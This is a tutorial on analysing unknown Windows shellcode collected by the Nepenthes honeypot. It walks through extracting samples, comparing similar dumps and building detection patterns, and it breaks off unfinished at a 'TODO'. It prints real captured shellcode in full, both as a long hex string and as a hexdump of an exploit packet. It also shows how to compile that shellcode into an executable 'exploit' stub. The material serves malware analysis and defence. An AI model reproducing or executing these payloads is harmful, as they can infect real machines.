With Nepenthes you’ll get a lot of known malware, but depending on the range you listen on you might get even more unknown stuff. Unknown and new stuff needs to be analyzed in order to collect it automatically in the future. The goal of this guide is to describe how to analyze malware, from collection with Nepenthes to developing a pattern to match that specific shellcode.
The following shellcodes analyse’d here are taken from our own wires on
4th August 2005
at this point of time nepenthes was able to recognize and handle the shellcodes we will analyse here.
To dump these shellcodes as ‘unknown shellcodes’ we removed the shellcode-generic module on a node, and got the samples from there.
To create the picture we removed the same module, so the shellcodes did not get recognized.
We decided to analyse the choosen samples, as they are quite complex, so there is a lot to learn.
The easiest way to debug shellcodes is to run them natively, which is our cases Windows. Although it is possible to debug them “offline” (i.e. without running them), it is a lot easier to see how they behave. Depending on the debugger you’ll also get many hints what a specific address means. I’ll assume that you have access to a Windows environment (preferably running in vmware). Don’t forget that you are dealing with malware, if you run these shellcodes you may infect yourself with virtually anything, that’s why I recommend vmware. Besides that you’ll need
And, of course, you need an unknown shellcode dump. These are saved in the hexdump/ directory of your Nepenthes installation.
We use ssh tunnel’d rsync to retrieve unknown heydumps from our nodes.
mkdir /tmp/newhexdumps/ rsync -rc --stats --progress -e ssh user@host:/where/is/nepenthes/hexdump/ /tmp/newhexdumps/
On http://www.mwcollect.org/ you can find several ‘unknown’ shellcodes.
That does not explict mean these shellcodes are unknown to nepenthes, as these are mwcollect tickets, but one never knows.
lets take
http://www.mwcollect.org/ticket/52
as an example.
we simply copy the shellcode, and run
tools/mwcollect-dump/mwcollect-dump.pl 460058004E00420046005800460058004E004200460058004600580046005800460058009D130001CCE0FD7FCCE0FD7F9090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090EB195E31C981E989FFFFFF813680BF329481EEFCFFFFFFE2F2EB05E8E2FFFFFF0353061F7457759580BFBB927F895A1ACEB1DE7CE1BE329409F93A6BB6D79F4D8571DAC681BF321DC6B35AF8ECBF32FCB38D1CF0E8C841A6DFEBCDC2883674907F895AE67E0C247CADBE329409F9226BB6D74C4C62CCDA8A81BF321DC6ABCDE284D7F9797C84DA9A81BF321DC6A7CDE284D7EB9D7512DA6A80BF321DC6A3CDE284D7968EF078DA7A80BF321DC69FCDE284D79639AE56DA4A80BF321DC69BCDE284D7D7DD06F6DA5A80BF321DC697CDE284D7D5ED46C6DA2A80BF321DC693016B0153A29580BF66FC81BE32947FE92AC4D0EF62D4D0FF626BD6A3B94CD7E85A9680AE6E1F4CD524C5D34064B4D7ECCDC2A4E863C77FE91A1F50D757ECE5BF5AF7EDDB1C1DE68FB178D4320EB0B37F015D037E273F6242F4D0A4AF766AC49B0F1DD49B7A1DD49B7E1DD49B6219C49B22C0D0EE63C5EABE63C57FC902C57FE9221F4CD5CD6BB14064980B77656BD693CDC294EA64F0218F3294803AF2EC8C3472980BCF2E390BD73A7F893472A00B178A9480BFB951DEE2F09080EC67C2D7345EB0983477A80BEB37EC836AB9DE983468B48362D1A6C934061F834A016B7C8CF238BA7B469341703F977854C0AFFC9B26E1613468B08362541F8CF4B9CE9CBCEF1F843431516BBD01540B6A6DCADDE4F090802FA20400 > /tmp/theticket
Now the file /tmp/theticket contains the shellcode as binary dump.
Before looking for unknown shellcodes, you should remove known ones and those which don’t look like shellcode.
bin/nepenthes -f rmknown,rmnonop /tmp/package/*
Let’s see what’s left.
ls
To continue the mwcollect ticket analysis. we run
bin/nepenthes -f noargs /tmp/theticket
and get
and we would be done.
But as we want to learn something here, we continue with the package.
Pick one sample and check if it is really a shellcode. Look out for nop slides (blocks of 0×90). You will probably see 0xeb after this block.
hexdump -C ./9499d1b12667bd93d5d376b46d3d5364.bin 00000000 05 00 00 03 10 00 00 00 8a 06 00 00 00 00 00 00 |................| 00000010 72 06 00 00 00 00 00 00 05 00 01 00 00 00 00 00 |r...............| 00000020 00 00 00 00 58 7d 75 75 40 eb c6 47 bc 71 4e a7 |....X}uu@ëÆGŒqN§| 00000030 1c d0 b5 97 00 00 00 00 00 00 00 00 00 00 00 00 |.е.............| 00000040 00 00 00 00 00 00 00 00 00 00 09 00 00 03 00 00 |................| 00000050 00 00 00 00 00 03 00 00 5c 00 5c 00 90 90 90 90 |........\.\.....| 00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| 00000070 90 90 90 90 90 90 90 90 90 90 90 90 eb 10 eb 19 |............ë.ë.| 00000080 9f 75 18 00 23 37 f3 77 eb e0 fd 7f 90 90 90 90 |.u..#7ówëàý.....| 00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 000000e0 90 90 90 90 eb 04 ff ff ff ff 90 90 90 90 90 90 |....ë.ÿÿÿÿ......| 000000f0 90 90 eb 04 eb 04 90 90 90 90 eb 04 ff ff ff ff |..ë.ë.....ë.ÿÿÿÿ| 00000100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 00000370 90 90 90 90 90 90 90 eb 15 b9 8b e6 13 41 81 f1 |.......ë.¹.æ.A.ñ| 00000380 d8 e7 13 41 5e 80 74 31 ff a2 e2 f9 eb 05 e8 e6 |Øç.A^.t1ÿ¢âùë.èæ| 00000390 ff ff ff 91 79 c6 29 e1 92 29 e2 ae 29 d2 be 0f |ÿÿÿ.yÆ)á.)â®)ÒŸ.| 000003a0 29 e2 aa f1 f1 ca 91 90 a2 a2 ca d5 d1 90 fd ca |)âªññÊ..¢¢ÊÕÑ.ýÊ| 000003b0 d0 d6 a2 a2 ca cf d1 d4 c1 4a 96 a2 a2 a2 a3 a2 |ÐÖ¢¢ÊÏÑÔÁJ.¢¢¢£¢| 000003c0 a2 a2 97 c0 aa 74 d6 81 82 36 62 3b 6b 68 1b fe |¢¢.ÀªtÖ..6b;kh.þ| 000003d0 b7 cb 1b e2 54 e2 75 a0 11 af 27 5b ef 66 3e b8 |·Ë.âTâu .¯'[ïf>ž| 000003e0 a6 ba 21 a3 71 b8 62 a0 b1 a5 22 96 a1 a5 16 28 |Šº!£qžb ±¥".¡¥.(| 000003f0 9b 8a ff c8 a0 f9 29 5a f1 f1 29 f5 9e 29 f6 98 |..ÿÈ ù)Zññ)õ.)ö.| 00000400 da a1 75 f0 29 f0 82 a1 75 91 79 e1 29 96 38 a1 |Ú¡uð)ð.¡u.yá).8¡| 00000410 55 91 6b 0e 90 6a 63 63 a7 0e 26 62 d7 54 29 d7 |U.k..jcc§.&b×T)×| 00000420 a2 89 ee 17 a2 d7 46 25 96 86 29 f4 86 a1 75 c4 |¢.î.¢×F%..)ô.¡uÄ| 00000430 29 ae f8 29 f4 be a1 75 29 a6 28 a1 65 fc 2b e6 |)®ø)ôŸ¡u)Š(¡eü+æ| 00000440 17 a2 5d e7 a2 f9 e9 d7 12 f9 21 61 a0 f6 5d f7 |.¢]ç¢ùé×.ù!a ö]÷| 00000450 aa 21 66 aa 27 62 d7 3c 16 a0 89 42 28 66 f6 f2 |ª!fª'b×<. .B(föò| 00000460 5d f7 be f2 f2 ca f6 26 1e a0 ca a0 a2 9b 48 29 |]÷ŸòòÊö&. Ê ¢.H)| 00000470 5e f2 c8 a3 c8 a0 5d f7 82 29 7a c8 b2 f5 f1 5d |^òÈ£È ]÷.)zȲõñ]| 00000480 f7 86 27 62 d7 fb 65 e7 a2 a1 a2 a2 a2 f2 c8 a6 |÷.'b×ûe碡¢¢¢òÈŠ| 00000490 f7 f1 5d f7 8e 29 56 65 e7 a2 d5 c0 a2 a2 ca c7 |÷ñ]÷.)Veç¢ÕÀ¢¢ÊÇ| 000004a0 da c7 a2 ca c8 c8 c8 8c 29 5e f7 f5 5d f7 ae 2b |ÚÇ¢ÊÈÈÈ.)^÷õ]÷®+| 000004b0 e7 a2 c8 a2 ca a2 a0 a2 a2 f4 f1 5d f7 8a 27 62 |ç¢È¢Ê¢ ¢¢ôñ]÷.'b| 000004c0 d6 b3 da b9 5d d7 a2 f2 c8 a3 f4 5d f7 b2 21 66 |Ö³Ú¹]×¢òÈ£ô]÷²!f| 000004d0 b2 49 7d 5d d7 a2 5d f7 b6 f2 f6 f5 5d f7 ba f1 |²I}]×¢]÷¶òöõ]÷ºñ| 000004e0 5d f7 92 5d f7 a6 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a |]÷.]÷Šjjjjjjjjjj| 000004f0 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a |jjjjjjjjjjjjjjjj| * 000005d0 6a 6a 8b 45 30 05 24 fb ff ff ff e0 eb f4 6a 6a |jj.E0.$ûÿÿÿàëôjj| 000005e0 0b 0b 1b 00 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a |....jjjjjjjjjjjj| 000005f0 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a |jjjjjjjjjjjjjjjj| * 00000610 6a 6a 6a 6a 6a 6a 6a 6a eb 06 6a 6a 59 1c 00 01 |jjjjjjjjë.jjY...| 00000620 8b 44 24 fc 05 e0 fa ff ff ff e0 6a 6a 6a 6a 6a |.D$ü.àúÿÿÿàjjjjj| 00000630 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a |jjjjjjjjjjjjjjjj| 00000640 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 6a 5c 00 |jjjjjjjjjjjjjj\.| 00000650 41 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 |A...............| 00000660 00 00 00 00 01 00 00 00 68 1c 09 00 01 00 00 00 |........h.......| 00000670 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |........À......F| 00000680 01 00 00 00 01 00 00 00 07 00 |..........| 0000068a
Now that we found an unknown shellcode, lets have a look if there are similar ones.
We use the bdiffm tool which is part of the Nepenthes tools collection.
You can find it in the tools/ directory of your Nepenthes installation.
It’s a good idea to check other files which share the same size with the sample you picked. We’ll try with 1674 bytes here.
bdiffm $( find -size 1674c )
There we go.
At least 50% similarity for all files, looks like we found something worth to analyze.
The difference in the samples can occur due to different xor decoder keys, of different shellcodes.
Grab the package here.
If you haven’t already done so, grab the package of unknown shellcodes from above. In order to create a valid pattern for all of them we will pick one randomly. We already saw that they are rather similar, so it doesn’t matter which one you pick. We’ll use e462ae904b762ae6dea3bceb6daee011.bin in this guide.
It’s time to extract the relevant part from our sample. This part can be very hard if you don’t have any experience with machine code. You already learned that it’s a good idea to look out for nop slides (0×90) followed by a jump (0xeb). That is in fact a good signature for shellcodes, but it won’t always work. Just keep in mind that shellcode often looks completely random and doesn’t seem to have any regular pattern.
What does all that mean for you pattern?
hexdump -C e462ae904b762ae6dea3bceb6daee011.bin (output truncated) * 00000370 90 90 90 90 90 90 90 eb 15 b9 8b e6 13 41 81 f1 |.............A..| 00000380 d8 e7 13 41 5e 80 74 31 ff a2 e2 f9 eb 05 e8 e6 |...A^.t1........| 00000390 ff ff ff 91 79 c6 29 e1 92 29 e2 ae 29 d2 be 0f |....y.)..)..)...| 000003a0 29 e2 aa f1 f1 ca 91 90 a2 a2 ca d5 d1 90 fd ca |)...............| (output truncated)
Notice offset 0×370? That’s our nop slide followed by 0xeb. Let’s create a dummy executable from this code. Grab mkcarray from the Nepenthes tools/ directory.
mkcarray --int3 --exploit --offset 880 < e462ae904b762ae6dea3bceb6daee011.bin > dummy.c
mkcarray’s command line options are
–int3 Add the int 3 instruction before the actual shellcode (more on this later).
–exploit Create an “exploit”, i.e. make the shellcode get executed upon binary execution.
–offset N Skip N bytes of data from the input file (we used 880 because that’s the decimal representation of 0×370).
You should now have a dummy.c which contains our shellcode ... TODO
